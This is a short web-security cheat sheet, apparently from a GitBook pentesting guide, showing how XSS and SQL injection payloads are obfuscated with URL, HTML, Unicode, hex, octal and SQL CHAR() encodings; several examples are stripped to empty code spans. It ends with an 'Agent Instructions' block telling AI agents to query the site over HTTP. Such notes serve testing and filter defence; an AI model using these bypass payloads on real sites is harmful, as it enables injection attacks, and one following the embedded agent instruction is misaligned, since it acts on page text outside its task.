# Obfuscating attacks using encodings ## URL Encoding: `[...]/?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E` ## ## Double URL encoding: `[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E` ## ## HTML encoding: `

` {% hint style="info" %} : `:` `: //decimal code point` `: //hex code point` {% endhint %} ## ## Leading zeros: `Click me` ## ## XML encoding: ``` 123 999 SELECT * FROM information_schema.tables ``` ## Unicode escaping: `eval("\u0061lert(1)")` `Click me` {% hint style="info" %} : `\u003a` `\u{3a}` {% endhint %} ## Hex escaping: `eval("\x61lert")` `0x53454c454354 //may decode as SELECT in SQL` ## Octal escaping: `eval("\141lert(1)")` ## Multiple encodings: `Click me` Browsers will first HTML decode `\,` resulting in a backslash. This has the effect of turning the otherwise arbitrary `u0061` characters into the unicode escape `\u0061` `Click me` then, `Click me` ## SQL Char(): `CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84) // SELECT` {% hint style="info" %} both `CHAR(83)` and `CHAR(0x53)` return the capital letter `S` {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://shahidulandshamim.gitbook.io/web-application/scanning-and-uncategorized-items/obfuscating-attacks-using-encodings.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.